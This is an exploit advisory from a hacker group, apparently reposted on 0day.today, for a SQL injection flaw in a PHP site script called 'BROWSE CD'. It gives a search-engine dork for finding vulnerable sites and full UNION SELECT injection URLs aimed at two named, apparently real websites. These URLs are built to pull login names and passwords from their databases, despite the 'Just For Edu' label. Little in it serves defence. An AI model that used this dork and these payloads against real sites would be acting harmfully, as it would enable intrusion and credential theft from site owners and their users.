Exploit for php platform in category web applications
=====================================
BROWSE CD SQL injection Vulnerability
=====================================
Author :: DrgPxX
Group :: Aras cyber Army
Email :: [email protected]
Discover :: 27 june 2010
Critical Lvl :: M
Publised :: 30 june 2010
vender :: n/a
---------------------------------------------------------------------------
BROWSE CD
~~~~~~~~~
Dork :: inurl:"ArtistDetail.php?id="
~~~~~~~~~~~~~~~~~~
demo :: http://www.targer.com/artistdetail.php?ID=[sqli]
~~~~~~~~~~~~~~~~~~~~~~~~~
Example Just For Edu :: http://www.champshillrecords.co.uk/artistdetail.php?ID=-999.9%20UNION%20ALL%20SELECT%201,%28SELECT%20concat%28login.login,0x20,login.password%29%20FROM%20%60champshillrecords%60.login%20LIMIT%200,1%29%20,3,4,5,6,7,8--
http://www.markkendallartists.com/artistdetail.php?ID=-999.9%20UNION%20ALL%20SELECT%201,%28SELECT%20concat%28logininfo.login,0x20,logininfo.password%29%20FROM%20%60kendall%60.logininfo%20LIMIT%200,1%29%20,3,4,5,6,7,8,9,10,11,12,13,14--
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+++++++++++++++++++++++++++++++++++++++
[!] greetiz to ::
DrgPxX,D3stan,hackfaz,hamed.err000r,Net_Spy,jawadn
All Muslim , Turkish , iranian hackers
+++++++++++++++++++++++++++++++++++++++
# 0day.today [2018-01-11] #